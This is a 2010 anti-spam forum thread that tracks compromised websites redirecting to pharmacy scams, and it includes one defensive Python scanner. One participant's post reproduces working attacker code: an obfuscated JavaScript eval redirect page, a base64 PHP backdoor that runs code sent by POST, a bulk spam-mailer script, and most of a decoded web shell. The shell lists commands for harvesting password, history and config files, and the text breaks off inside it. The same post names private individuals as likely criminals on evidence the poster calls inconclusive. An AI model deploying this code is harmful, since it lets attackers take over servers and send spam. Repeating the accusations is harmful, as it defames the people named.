Compromised hosts

Any research, news or information regarding the wide variety of techniques criminals use to take over your computers or web servers.

Nov 6 stop.html > Online Pharmacy

Postby Red Dwarf » Sun Nov 07, 2010 4:50 pm

On Nov 6 only, the compromised hosts used a redirection with stop.html. Samples

cpapexpressaustralia.com.au/stop.html
ebinder.matrixachievementgroup.com/stop.html
propertyinvesting.co.uk/stop.html
www.bengaloncology.com/stop.html
www.bikestylesinc.com/stop.html
www.camperzoutlet.com/stop.html
www.sustainabletn.org/stop.html

These redirected to Online Pharmacy brand at timeforrefill.com
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Nov 7 > aciadoctor.com Pharmacy Express

Postby Red Dwarf » Sun Nov 07, 2010 4:59 pm

On Nov 7 the redirections of compromised servers landed on Pharmacy Express brand site aciadoctor.com (Registration Service Provided By: Namecheap.com, registered from Russia)

Samples
alquran.22web.net/jyvmadf.html
boardstore.com.ua/xuzth.html
chelmonline.home.pl/txrnsl.html
chelmonline.home.pl/txrnslhtml (Period missing error)
cmok.neostrada.pl/hovmd.html
darklight.com.ua/jaloxhtt.html
gbj.com.br/wxufub.html
geralt.darklight.com.ua/nsbhiog.html
hot.kh.ua/mm.html
idea.if.ua/rpnjwpvm.html
idea.if.ua/sjt.html
1setembro.com/niicuvn.html
adgroup.ae/aebaug.html
adgroup.ae/nltgzgdv.html
calincatalina.home.ro/vkljf.html
fasti.org/ebwr.html
greatcasinosports.co.uk/dt.html
marudhara.dhamma.org/s.html
minouklim.com/yrt.html
pallaviinstitutions.com/in.html
saadees.com/sgt.html
tandalasafaris.co.ke/u.html
tarentaalrandsafari.co.za/vlhn.html
tepc.gov.np/f.html
vejinbarzan.com/x.html
windyplains.co.za/al.html
zarabajte.hostuju.cz/tcl.html

Nov 8 > drmedicpills.com Pharmacy Express

Postby Red Dwarf » Mon Nov 08, 2010 5:13 pm

The compromised servers redirect to drmedicpills.com Pharmacy Express
Nov 24 Edit: Name Server: BLOCKEDDUETOSPAM.PLEASECONTACTSUPPORT.COM Name Server: DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM

Samples

cellantenachicago.home.pl/iqu.html
chelmonline.home.pl/irs.html
cmok.neostrada.pl/xlpzeyp.html
darklight.com.ua/qdhvishu.html
gbj.com.br/psnrumw.html
idea.if.ua/ecsih.html
idea.if.ua/krpgn.html
kghost.co.cc/ojjudcu.html
m.tamilmob.com/zjb.html
matesqo.zaridi.to/ruws.html
model.konotop.net/qsdumo.html
oga.7u.cz/zrdlya.html
sp2.trzcianka.com.pl/si.html
webmail.mayaad.net/a.html

Re: Compromised hosts

Postby Red Dwarf » Thu Nov 11, 2010 4:38 pm

Today's redirections go to drmedicpills - the Pharmacy Express criminal fraud. Nov 24 Edit: Name Server: BLOCKEDDUETOSPAM.PLEASECONTACTSUPPORT.COM Name Server: DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM

These web servers are all compromised.

1setembro.com/dlpxi.html
1setembro.com/jlas.html
calincatalina.home.ro/sxrs.html
tarentaalrandsafari.co.za/mub.html
tarentaalrandsafari.co.za/y.html
tepc.gov.np/aapju.html
tepc.gov.np/g.html
tinsight.pt/pdzqjkr.html
tinsight.pt/ulcb.html
ukcasinowin.co.uk/h.html
ukcasinowin.co.uk/i.html
windyplains.co.za/brb.html
zsp2.neostrada.pl/dnzq.html
zsp2.neostrada.pl/kv.html

November 18-19 2010

Postby Red Dwarf » Thu Nov 18, 2010 11:42 pm

A sample of spammed hijack URLs from the past 48 hours. Typical redirections go to the Pharmacy Express fraud.

Owners of these web sites need to strengthen their passwords and scan for trojans.

1setembro.com/pdzg.html
1setembro.com/wmlsdoxo.html
afeishi.s56.stinkbugonline.com/ntptzsf.html
afeishi.s56.stinkbugonline.com/wmnk.html
airpur.awardspace.com/iophpcs.html
asc11.alfamoon.com/va.html
badboy.gol.ge/skssl.html
chelmonline.home.pl/xdspkheh.html
chelmonline.home.pl/yuhbvpar.html
cmok.neostrada.pl/jjdkgxvu.html
cmok.neostrada.pl/snwyvqj.html
fgst.tecar.com.ua/dbjnpbtp.html
fgst.tecar.com.ua/xjoe.html
greatcasinosports.co.uk/i.html
greatcasinosports.co.uk/kb.html
greatcasinosports.co.uk/kcqhct.html
ipbravio.com.br/bxujhr.html
matesqo.zaridi.to/yghcfq.html
mb2ny.com/ivcybwf.html
mb2ny.com/tkrim.html
mb2ny.com/xm.html
minouklim.com/hsxl.html
minouklim.com/y.html
mladen.sni.users.sbb.rs/jnq.html
model.konotop.net/exjygmln.html
periodicodecision.com.ar/cesrd.html
periodicodecision.com.ar/mqsp.html
pg.com/privacy.html
queicoviagens.com.br/mhxokrn.html
raja007.co.cc/lb.html
raynhamprimaryschool.co.uk/cprgn.html
raynhamprimaryschool.co.uk/n.html
revistagrip.com.ar.mx95.sinspam.com/kizvudxe.html
sp2.trzcianka.com.pl/jrszafxx.html
sp2.trzcianka.com.pl/r.html
tarentaalrandsafari.co.za/pkz.html
tarentaalrandsafari.co.za/zaqd.html
tecnocenter.ind.br/yoogyotn.html
tepc.gov.np/eyx.html
tepc.gov.np/g.html
tepc.gov.np/kmwauuag.html
tepc.gov.np/ph.html
tinsight.pt/d.html
tinsight.pt/iuqjrq.html
upload.mpspb.com/bgjojp.html
upload.mpspb.com/jdhuullr.html
webmail.mayaad.net/kjnjvkj.html
webmail.mayaad.net/ubnwhb.html
windyplains.co.za/su.html
windyplains.co.za/wbvdmfqm.html
zsp2.neostrada.pl/iten.html
zsp2.neostrada.pl/ljawqcil.html
zsp2.neostrada.pl/wy.html
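A defender-side check matching the pattern in these posts (small, randomly named .html files dropped on a compromised server whose only job is to redirect visitors off-site). The script below is an added example, not code from the thread: it walks a web root, flags HTML files that carry a meta refresh, a JavaScript location assignment, or an obfuscated eval, and reports the off-site hosts each one points at. The sample pages, file names and the `www.example.org` host are constructed for the demonstration.

```python
"""Scan a web root for injected redirect pages (added example, constructed data)."""
import re
import tempfile
from pathlib import Path

# Constructed sample pages; the hosts and file names are placeholders, not real sites.
SAMPLES = {
    "stop.html": '<html><head><meta http-equiv="refresh" '
                 'content="0;url=http://pharmacy.example/"></head></html>',
    "xuzth.html": "<html><script>window.location.href='http://pills.example/?id=1';"
                  "</script></html>",
    "obf.html": "<script>eval(String.fromCharCode(100,111,99));</script>",
    "index.html": "<html><body><h1>Welcome</h1><a href='/about.html'>About</a></body></html>",
}

# Content indicators typical of a dropped redirect page.
INDICATORS = [
    ("meta-refresh", re.compile(r'http-equiv\s*=\s*["\']?refresh', re.I)),
    ("js-location", re.compile(r'(window\.|document\.)?location(\.href)?\s*=', re.I)),
    ("obfuscated-eval", re.compile(r'eval\s*\(.*(fromCharCode|unescape|atob)', re.I | re.S)),
]


def external_targets(html, own_host):
    """Return the off-site hosts referenced by absolute URLs in the page."""
    hosts = re.findall(r'https?://([^/\s\'"<>]+)', html, re.I)
    return sorted({h.lower() for h in hosts if h.lower() != own_host.lower()})


def classify(html, own_host):
    """Name the indicators that fire on one page and where it sends visitors."""
    hits = [name for name, rx in INDICATORS if rx.search(html)]
    return {"indicators": hits, "external_hosts": external_targets(html, own_host)}


def scan_webroot(root, own_host, max_bytes=4096):
    """Scan every small .htm/.html file under root; large pages are skipped because
    injected redirect stubs are tiny."""
    findings = {}
    for path in Path(root).rglob("*.htm*"):
        if path.stat().st_size > max_bytes:
            continue
        result = classify(path.read_text(errors="replace"), own_host)
        if result["indicators"]:
            findings[path.name] = result
    return findings


def demo():
    """Write the constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for name, body in SAMPLES.items():
            Path(d, name).write_text(body)
        return scan_webroot(d, "www.example.org")


if __name__ == "__main__":
    for name, info in demo().items():
        print(name, info["indicators"], "->", info["external_hosts"])
```

Run it against a real document root with `scan_webroot("/var/www/html", "your.host")`; anything it flags that you did not put there is worth a look, and a hit with an off-site host in the report is the stub a spam run would be linking to.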

Re: Compromised hosts & current redirections

Postby Red Dwarf » Wed Nov 24, 2010 4:16 pm


Re: Compromised hosts

Postby Amouse » Sun Dec 05, 2010 10:33 pm

This is a bit of a long story...
I had a new email address created on the nzart web site nzart.org.nz.
A month later it was harvested supposedly. I actually think it was supplied to the spam gang by an amateur radio operator but will not name these people as the evidence I have is not conclusive. I have named others that I think are involved however.

A full account including my web logs is available here... Do not worry I have no interest in identifying members of this group. Please treat my web logs with respect. There is personal information that I can not remove from them as it is just too much to sort through.

http://www.bencom.co.nz/bk/bencom-hack.tgz


Beware! There is a disabled virus file as part of the evidence. If you do not know what you are doing do not download.

Back to the story. I started tracking and eventually named some names so that this info got back to the hacker/spammer. I registered a new web site and let the spammer know what it was. I secured most of it and what I did not the hacker attacked and I secured it until there was only the OSCommerce site left unsecured.

The hacker then found a hole which they exploited to load URLs of redirectors on hacked sites. I allowed spammy to keep doing this until he felt happy. Spammy attacked and loaded a spam bot. I then set about raping spammy for all he was worth until he figured what I was up to.

Spammy is not happy with me and continues to attack my web site and ftp server. I have to be very proactive blocking him.

The ip address using the spam bot console.php was 223.25.242.17 which the best I can gather is in Malaysia.
The IP addresses loading redirect URLs to my wiki are...

213.5.70.184
79.142.65.199
91.214.45.223

And this IP continues to attack my contact form

79.142.68.99

altushost.com keeps telling me that they will address the attacks on my server but as yet they have not.
A quick look at the reputation of altushost says it all. PHP C&C server host.

I have left the history of what the url redirect spam is like up...

http://www.zlham.geek.nz/wiki/radio/index.php?title=ZL_Ham_Radio_Wiki_talk:General_disclaimer&action=history


Spammer redirect script goes to CPH site

If you have any questions feel free to PM me or email me... Whois for my domains are correct.
I would appreciate any info that I can send to LE that may lead to the conviction of this hacker/spammer.
My #1 suspect is Dean Westbury, one of the original members of Global Web Promotions and the person I think helped write sobig with Ruslan. The NZ contact, I suspect, is a person named Joseph Dunning of Christchurch NZ. After dropping Westbury's and Dunning's names all hell broke loose, and Westbury is known to frequent Malaysia. Westbury lives in the Philippines and I believe is a senior member of a hacker gang. Certainly some of the attacks on my server have been very amateurish. The biggest mistake being the fact the hacker thought I was running joomla gcalendar when in fact I was running a different package with the same name.

<html>
<head>
<title>Object not found!</title>
<!-- Xm5mbTgpIHFqcSdkWmpqaGNvbllUbGlSVG8kW2lf -->
<style type="text/css"><!--/*--><![CDATA[/*><!--*/
    body { color: #000000; background-color: #FFFFFF; }
    a:link { color: #0000CC; }
    p, address {margin-left: 3em;}
    span {font-size: smaller;}
/*]]>*/--></style>
<script>function brand (upload){ var flowerpot=''; for (var escrow=0; escrow<upload.length; escrow+=3){flowerpot = String.fromCharCode(upload.substring(escrow,escrow+3)) + flowerpot;} return flowerpot; }</script>
</head>

<body>
<h1><!-- Object not found! --></h1>
<p>

  <!--
    The requested URL was not found on this server.

 

    If you entered the URL manually please check your
    spelling and try again.
  -->
 

</p>
<p>  <!--
If you think this is a server error, please contact
the webmaster.
         -->
</p>

<h2><!--Error 404--></h2>
<address>
</address>
<script>
var bloom='04103905204804905404904905404904905';
var industry='00490490560530480550520480550520480';
var optimist='57049049057049049057049049054052048';
var gag='05004904905304804905604804905604804';
var aiff='90530490490520490490480500490500490';
var highlight='49052048049055057048052049049057048';
var modem='04905505704805705704804905004905405';
var michigan='20480570570480490490490570480490390';
var ascii_file='40100110097114098061110111105116097';
var sip='099111108046119111100110105119';

eval(brand(bloom+industry+optimist+gag+aiff+highlight+modem+michigan+ascii_file+sip));
</script>
</body>
</html>


Web sites collected after raping spammy's script and replacing it with my own.
These sites are mostly OSCommerce breached with SQL injection.

15/10/2010 Most owners notified
http://www.wupperchair.de/shop/images/infobox/play/waste.html
 http://www.djfaudio.com.ar/catalog/images/icons/distance/lesson.html
 http://www.schule-christiani.de/images/downtown.html
 http://www.feastfood.es/shop/images/icons/curse/make.html
 http://zip-downloads.com/images/look.html
 http://onlinegamestall.com/images/banners/impact/imagine.html
 http://ekolczyk.pl/images/slice.html
 http://www.searchforsales.authsafe.com/images/retreat.html
 http://www.stock-code.com/images/UserFiles/apartment/pillow.html
 http://www.micashflow.net46.net/images/pump.html
 http://www.luxor-brushes.com/images/test.html
 http://www.inlineaudio.co.za/images/wound.html
 http://www.moerdijkcomputers.nl/images/everything.html
 http://www.interpack-lodz.pl/images/pants.html
 http://www.phdrugstore.com/images/shave.html
 http://www.rossarinshop.com/images/mister.html
 http://www.chillequipment.com/images/chain.html
 http://www.obrazy.com.pl/images/dekory/drink/write.html
 http://www.pbqaat.info/extensions/extend/explain.html
 http://www.cheapmovie.nl/images/default/depend/nice.html
 http://sacramentomoonbounce.com/cart/images/aunt.html
 http://store.eaglemedia.net/images/maintain.html
 http://interactionprojects.com/images/gesture.html
 http://mafland.com/shop/beyond.html
 http://www.alsopaintings.com/images/abandon.html
 http://mediaro.ro/tenet/images/tangle.html
 http://sinnbringer.de/images/infobox/mumble/welcome.html
 http://www.webstersbutchersblocks.co.uk/images/explosion.html
 http://www.cachosecia.com.br/loja/images/chase.html
 http://mediaro.ro/tenet/images/tangle.html
 http://surftacklestore.com/store/images/machine.html
 http://sinnbringer.de/images/infobox/mumble/welcome.html
 http://www.universitrade.com/images/title.html
 http://www.netwerkcomputers.nl/images/part.html
 http://rombud.com/images/gold.html
 http://bwprintercare.com/eshop/images/howl.html
 http://79.170.40.34/suncentershop.co.uk/cache/tent/hero.html
 http://www.go-ride.pl/images/self.html
 http://fishinggroundbait.nl/catalog/images/flee.html
 http://boutique-gsm.com/catalog/images/rule.html
 http://alovine.com/osc/images/deep.html
 http://www.123electronics.be/catalog123/images/bond.html
 http://totallyone.inwards.com/catalog/images/lonely.html
 http://www.cytelmotul.com/images/echo.html
 http://www.pbqaie.info/extensions/indeed/land.html
 http://ns2.bounce789.com/store/images/strength.html
 http://shop.duimelijntje.net/pub/shelf/when.html
 http://www.ezicars.com.au/os/images/decision.html
 http://itc.idenx.web.id/images/default/hope/guard.html
 http://www.wholesale41.com/images/mail/confusion/security.html
 http://onlinegamestall.com/images/banners/impact/imagine.html
 http://solunetworks.com/ecommerce/images/assume.html
 http://anibal.netai.net/catalog/images/murmur.html
 http://www.gordonrobertsonphotography.com/catalog/images/embarrass.html
 http://ammahdavi.com/shop/interest.html
 http://93.186.178.13/~dinegies/shop/images/glare.html
 http://www.padangos.net/images/panic.html
 http://66.119.52.124/catalog/images/concern.html
 http://www.desiroc.com/images/banners/cast/cloud.html
 http://www.virandoapaginalivraria.com.br/images/prevent.html
 http://ezion.com.au/images/call.html
 http://ezion.com.au/images/call.html
 http://www.inlineaudio.co.za/images/wound.html
 http://laumarherbals.com/catalog/images/hello.html
 http://www.mjbspecialityextracts.com/catalog/images/shower.html
 http://www.bebenatur.com/images/glare.html
 http://www.webceliaca.com/images/tone.html
 http://secure.wholesale41.com/images/default/easy/recently.html
 http://vercasas001.verhost.com/catalog/images/clave441/deep/dude.html
 http://suan-intapalum.com/shopping/images/stage.html
 http://www.kombideposu.com/images/default/basement/discuss.html
 http://www.olejservis.com/images/inch.html
 http://baldwinsart.com/art/images/servant.html
 http://www.deliveryexpressng.com/images/warehouse.html
 http://ex2.prowebnet.ch/oscasiaticashop/catalog/images/default/grace/human.html
 http://www.beds4u.nl/images/hallway.html
 http://maggiesmagicmuffins.relationzip.com/images/crap.html
 http://southkytractor.com/store/images/chop.html
 http://rene-webmedia.de/rene_shop/catalog/images/send.html
 http://mafland.com/shop/beyond.html
 http://www.gogiftusa.com/images/banners/indicate/silently.html
 http://www.ruyihealth.com/ruyi/images/water.html
 http://anibal.netai.net/catalog/images/murmur.html
 http://www.schoenthal.biz/shop/images/powered/bride/quickly.html
 http://www.jasiek888.livenet.pl/sklep/images/scan.html
 http://www.schule-christiani.de/images/downtown.html
 http://www.pbqase.info/extensions/necessary/gonna.html
 http://www.beds4u.nl/images/hallway.html
 http://www.seximbol.net/images/bandage.html
 http://www.articuloshogar.com/tienda/images/crouch.html
 http://www.kochfit.de/images/thrust.html
 http://shop.adult-private-movies.com/images/BestSellersBox/soul/hide.html
 http://www.call-emperor.com/web/images/haul.html
 http://www.regalatelo.net/images/breakfast.html
 http://lilihozak.com/shop/images/icons/toss/visit.html

16/10/2010 Not notified and some will still be infected
 http://farmfreshtexas.com/Cart/images/receiver.html
 http://bwprintercare.com/eshop/images/howl.html
 http://adsel.net.pl/images/mention.html
 http://eshop.fenegro.com/images/icons/concern/halfway.html
 http://store.dafugizit.com/images/drag.html
 http://www.artmys.com/images/sugar.html
 http://smycken.fi/shop/images/under.html
 http://tiendavirtual.mmendiola.net/images/frame.html
 http://j-crest.com/images/mostly.html
 http://gadgetcube.net/images/fine.html
 http://www.aichatou.com/images/plan.html
 http://modelismo-correias.com/images/lady.html
 http://psloc.com.br/loja/images/also.html
 http://svgjewels.com/images/stuff.html
 http://betterthantherest.co.uk/catalog/images/state.html
 http://au858.com/images/infobox/journey/dawn.html
 http://luxurypetite.com/catalog/images/official.html
 http://kitchens247.com/images/would.html
 http://thai-jin.com/flowers/images/follow.html
 http://eigenershop.php-scripte-shop.com/images/fast.html
 http://brasiltintas.com/loja/images/chase.html
 http://dragonscape.info/shop/images/infobox/blanket/detail.html
 http://demos.creloaded.com/crecds/images/default/plead/several.html
 http://mashhadbazar.net/images/library.html
 http://jacklynsgiftshop.net/images/channel.html
 http://best14.net/images/priest.html
 http://righthosting.net/online/images/hate.html
 http://eshop.bazcar.com/images/graphs/expect/score.html
 http://bowlerslocker.com/catalog/images/bean.html
 http://bedavakitaplar.net/images/introduce.html
 http://almasdanesh.ir/shop/images/hallway.html
 http://crazyshopping4u.com/shop/images/difference.html
 http://s338152760.onlinehome.fr/meoui/images/near.html
 http://www.blacknightingale.com.au/catalog/images/third.html
 http://bankeamoozesh.ir/shop/therefore.html
 http://www.bielefeld-immobilien.de/images/infobox/beautiful/customer.html
 http://longbeachmoonbounce.com/cart/images/track.html
 http://greensboromoonbounce.com/cart/images/upstairs.html
 http://nationwidegardenstore.com/store/images/banners/entirely/sand.html
 http://eshop.widestore.net/images/default/dinner/horror.html
 http://poi-group.net/shop/images/icons/clothes/upper.html
 http://eshop.solelunaonlus.org/images/default/suicide/five.html
 http://www.agostiniinformatica.com.br/LOJA/images/closely.html
 http://www.agathasarah.com/images/child.html
 http://rayanaco.com/images/faint.html
 http://kadunovidade.net/images/hour.html
 http://digiflex.com.br/loja/images/division.html
 http://lubasistemas.com.ar/images/garage.html
 http://www.bodybuildingoz.com.au/store/images/authority.html
 http://shop.leisch.at/catalog/images/glimpse.html
 http://alpha-group.com.mx/carrito1/images/board.html
 http://shop.parkinsonmotorcycles.co.uk/images/dvd/smooth/slowly.html
 http://projectgreen.es/catalog/includes/upset/drive.html
 http://www.compisys.ch/shop/catalog/images/softly.html
 http://www.purchase7.com/images/maitreyii/blaze/press.html
 http://www.tintate.com/images/path.html
 http://www.mijootour.com/osc/images/wallet.html
 http://www.thejewelrycheststore.com/images/mail/whistle/joker.html
 http://www.rolandmpx-90.com/store/images/engage.html
 http://www.sillybandzeurope.com/images/loud.html
 http://www.edisonhumor.com/images/curse.html
 http://www.brilwonders.nl/images/remember.html
 http://www.smconceptstore.com/images/icons/stone/shotgun.html
 http://www.mj-mit.com/images/stuff.html
 http://www.republicarsenal.com/images/dvd/restaurant/thumb.html
 http://www.odzywki.katowice.pl/images/interview.html
 http://www.gamesgalaxy.co.uk/images/spirit.html
 http://www.rasmina.net/images/stream.html
 http://www.nopierdaseltino.com/tienda/images/spell.html 


This one is still alive if you are brave enough to access it to see what spammy does.
http://www.gamesgalaxy.co.uk/images


I thought about using it to attack altushost but thought it best not to mail bomb them or gblx (upstream for altushost) for that matter. Lucky I have some moral standards and the apache log file is way too large to cover my tracks. I did consider it. Head for the last googlexxxx file in the dir listing.

console.php

(lessthansign)?php echo eval(base64_decode("aWYoaXNzZXQoJF9HRVRbInBhcnQiXSkpIHsgIGlmKCRfR0VUWyJwYXJ0Il09PSJzZ
WMiKSAgZWNobyAicGFydGdvb2QiOyB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJnZ2ciXSkpIHsgICBpZi
gkX1BPU1RbImdnZyJdPT0xKSAgICAgICAgZWNobyAib2sxMSI7ICB9IGVsc2UgaWYoaXNzZXQoJF9QT1N
UWyJtYWluIl0pKSB7ICBldmFsKHVybGRlY29kZSgkX1BPU1RbIm1haW4iXSkpOyAgICB9")); ?(greaterthansign)


Decoded as with my mods to rape spammy's code...

(lessthansign)?php

$myFile = "testFile.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
if(isset($_GET["part"])) { if($_GET["part"]=="sec")  echo "partgood"; }
else if(isset($_POST["ggg"])) { if($_POST["ggg"]==1)        echo "ok11";  }
else if(isset($_POST["main"])) {  fwrite($fh, (urldecode($_POST["main"]))); }
fclose($fh);

?(greaterthansign)


Remove file creation and change fwrite($fh, (urldecode($_POST["main"])) to eval(urldecode($_POST["main"]))
and you have what spammy loads onto hacked machines. This allows him to load more code.

I raped spammy and this gave me this code to harvest his data and ownz joo for two days until he used the mechanism in the code to figure he was being raped.

(lessthansign)?php
$myFile = "testFile.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
$myFile2 = "shagspammy.txt";
$fh2 = fopen($myFile2, 'a') or die("can't open file");
fwrite($fh, "\n\r Session Start \n\r");
function convertR($fm) {   
   for($c=0;$c<strlen($fm);$c++) {       
    $fm[$c]=chr(ord($fm[$c])-2);   
   }   
   return $fm;
  }
if(isset($_GET["part"])) {
 if($_GET["part"]=="sec") 
  echo "partgood";
} else if(isset($_POST["ggg"])) {
 if($_POST["ggg"]==1)
  echo "ok11";
  /*fwrite($fh, "\n\r ggg \n\r");*/
} else if(isset($_POST["main"])) { 
 /*fwrite($fh, ("\n\r".urldecode($_POST["main"]."\n\r")));
 if(isset($_POST["m"]))
    fwrite($fh, ("\n\r m=".convertR(urldecode($_REQUEST["m"]))."\n\r"));
    */
     
 if(isset($_POST["ggg"])) {
  if($_POST["ggg"]==1)
   echo "ok11"; 
   /*fwrite($fh, "\n\r ggg 222 \n\r");*/
   
  } else if(isset($_POST["m"])) {
/*   fwrite($fh, ("\n\r Second m=".convertR(urldecode($_REQUEST["m"]))."\n\r"));*/
   error_reporting(0);     
   set_time_limit(300);
   $m=$f=$r=$t=$mes=$p=$scs=$sce=$name="";
   if(isset($_POST["m"]))
    $m=convertR(urldecode($_POST["m"]));
   if(isset($_POST["f"]))
    $f=convertR(urldecode($_POST["f"]));
   if(isset($_POST["r"]))
    $r=convertR(urldecode($_POST["r"]));
   if(isset($_POST["t"]))
    $t=convertR(urldecode($_POST["t"]));             
   if(isset($_POST["mes"]))
    $mes=urldecode($_POST["mes"]);
   if(isset($_POST["name"]))
    $name=convertR(urldecode($_POST["name"]));     
   if(isset($_POST["p"]))
    $p=convertR(urldecode($_POST["p"]));
   if(isset($_POST["scs"]))
    $scs=convertR(urldecode($_POST["scs"]));     
   if($scs=="")
    $scs=200000;     
   if(isset($_POST["sce"]))
    $sce=convertR(urldecode($_POST["sce"]));       
   if($sce=="")
    $sce=800000;           
   $mm=split(";",$m);     
   fwrite($fh, "\n\r SPAMMER VARIABLES m=".$m."\n\r f=".$f."\n\r r=".$r."\n\r t=".$t."\n\r mes=".$mes."\n\r
name=".$name."\n\r p=".$p."\n\r scs=".$scs."\n\r sce=".$sce."\n\r");
   if($m==NULL) {
    echo "0^0^";   
   } else {       
    $arrayNotGood=array();
    $arrayGood=array();
    $to=$m;       
    $subj=$t;       
    $hostin=$_SERVER["HTTP_HOST"];       
    if($hostin=="" or eregi("[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}",$hostin)) {
     $hostinMass=array("yahoo.com",
"yahoo.com","yahoo.com","hotmail.com",
"live.com","gmail.com","gmail.com",
"mail.com","
aol.com","aol.com","inbox.com");
     $hostin=$hostinMass[rand(0,10)];   
    }
    $from=substr($f,0,strrpos($f,"@"))."@".$hostin;  /*      $head = "From: \"$name\" $from\n"; */
    $text="";
    $head="";
    eval($mes);
    fwrite($fh2, "\n\r ".$linkin."\n\r");
    $mg=0;       
    $mb=0;       
    for($c=0;$c<count($mm);$c++) {
     $sleepTime=rand($scs,$sce);                     
     $bccRand=500;                     
     $stHead="";                     
     $boolInRand=0;                     
     if($bccRand) {
      if(count($mm)>($c+$bccRand)) {
       $boolInRand=1;                           
       for($k=$bccRand;$k>0;$k--) {                   
        if($k==$bccRand)
         $stHead="Cc: ";                   
        if($k==1)                     
         $stHead.=$mm[($c+$k)]."\n";                   
        else                     
         $stHead.=$mm[($c+$k)].",";               
       }             
      }           
     }           
     if(fwrite($fh, "\n\r SPAMMER MAIL".$c."=".$mm[$c]."\n\r Subject=".$subj."\n\r Text=".$text."\n\r st Head=".$stHead."\n\r head=".$head)) {                 
      if($boolInRand==1) {
       $mg+=1+$bccRand;
      } else
       $mg++;                 
       $arrayGood[]=$mm[$c];               
       if($boolInRand==1) {
        for($k=$bccRand;$k>0;$k--)
         $arrayGood[]=$mm[($c+$k)];
       }           
     } else {                   
      if($boolInRand==1) {
       $mb+=1+$bccRand;
      } else
       $mb++;                 
       $arrayNotGood[]=$mm[$c];               
       if($boolInRand==1) {
        for($k=$bccRand;$k>0;$k--) $arrayNotGood[]=$mm[($c+$k)];
       }           
     }                           
     if($sleepTime=="")
      usleep(500000);           
     else               
      usleep($sleepTime);           
     if($boolInRand==1)
      $c=$c+$bccRand;       
    }               
    if(count($arrayNotGood)>0) {           
     $currArrayNot="";           
     foreach($arrayNotGood as $arrayNotGoodCurr) {               
      $currArrayNot.=$arrayNotGoodCurr.";";               
     }           
     $currArrayNot=substr($currArrayNot,0,strrpos($currArrayNot,";"));           
     echo $mg."^".$mb."^".$currArrayNot."^";
     fwrite($fh, "\n\r SPAMMER RETURN VALUE \n\r".$msg."\n\r".$mb."\n\r".$currArrayNot."\n\r");
    } else {
     echo $mg."^".$mb."^";
     fwrite($fh, "\n\r SPAMMER RETURN VALUE \n\r".$msg."\n\r".$mb."\n\r");
     
    }                                                               
   }
  } 
 }
fclose($fh);
fclose($fh2);
?(greaterthansign)


Spammy loads console.php (the base64-encoded file above) with a file called googlexxxxxxx.php (xxx = hex digits). googlexxxx.php is a complex console-type program that allows full access to the system with full upload and download facility.

Here is a copy. Truncated.

(lessthansign)?php $D=strrev('edoced_46esab');$s=gzinflate($D('7X1te9s2suh3/QqY1QZiItGSn......
..............2/4GM4kQ1yb9AB7OVCfrob+Dw=='));create_function('',"}$s//"); ?(greaterthansign)


Here is what it looks like decoded. If you have a test server replace the lessthan & greaterthan and run.
The program does not phone home or anything like that but has a self remove function.

googlexxxxxxxxxxxx.php

<?php
$color="#df5";
$default_action='FilesMan';
$default_use_ajax=true;
$default_charset='Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents=array("Google","Slurp",
"MSNBot","ia_archiver","Yandex","Rambler");
if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT']))
{header('HTTP/1.0 404 Not Found');exit;}}

@session_start();@ini_set('error_log',NULL);@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);

if(get_magic_quotes_gpc()){function Xstripslashes($array){return is_array($array)?array_map('Xstripslashes',$array):stripslashes($array);}
$_POST=Xstripslashes($_POST);}

$os='nix';if(strtolower(substr(PHP_OS,0,3))=='win')$os='win';

$safe_mode=@ini_get('safe_mode');if(!$safe_mode)error_reporting(0);

$disable_functions=@ini_get('disable_functions');
$home_cwd=@getcwd();if(isset($_POST['c']))@chdir($_POST['c']);$cwd=@getcwd();if($os=='win'){$home_cwd=str_replace("\\","/",$home_cwd);$cwd=str_replace("\\","/",$cwd);}
if($cwd[strlen($cwd)-1]!='/')$cwd.= '/';

if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=(bool)
$GLOBALS['default_use_ajax'];

if($os=='win')
$aliases=array(
"List Directory"=>"dir",
"Find index.php in current dir"=>"dir /s /w /b index.php",
"Find *config*.php in current dir"=>"dir /s /w /b *config*.php",
"Show active connections"=>"netstat -an",
"Show running services"=>"net start",
"User accounts"=>"net user",
"Show computers"=>"net view",
"ARP Table"=>"arp -a",
"IP Configuration"=>"ipconfig /all"
);
else
$aliases=array(
"List dir"=>"ls -lha",
"list file attributes on a Linux second extended file system"=>"lsattr -va",
"show opened ports"=>"netstat -an | grep -i listen",
"process status"=>"ps aux",
"Find"=>"",
"find all suid files"=>"find / -type f -perm -04000 -ls",
"find suid files in current dir"=>"find.-type f -perm -04000 -ls",
"find all sgid files"=>"find / -type f -perm -02000 -ls",
"find sgid files in current dir"=>"find.-type f -perm -02000 -ls",
"find config.inc.php files"=>"find / -type f -name config.inc.php",
"find config* files"=>"find / -type f -name \"config*\"",
"find config* files in current dir"=>"find.-type f -name \"config*\"",
"find all writable folders and files"=>"find / -perm -2 -ls",
"find all writable folders and files in current dir"=>"find.-perm -2 -ls",
"find all service.pwd files"=>"find / -type f -name service.pwd",
"find service.pwd files in current dir"=>"find.-type f -name service.pwd",
"find all .htpasswd files"=>"find / -type f -name .htpasswd",
"find .htpasswd files in current dir"=>"find.-type f -name .htpasswd",
"find all .bash_history files"=>"find / -type f -name .bash_history",
"find .bash_history files in current dir"=>"find.-type f -name .bash_history",
"find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir"=>"find.-type f -name .fetchmailrc",
"Locate"=>"",
"locate httpd.conf files"=>"locate httpd.conf",
"locate vhosts.conf files"=>"locate vhosts.conf",
"locate proftpd.conf files"=>"locate proftpd.conf",
"locate psybnc.conf files"=>"locate psybnc.conf",
"locate my.conf files"=>"locate my.conf",
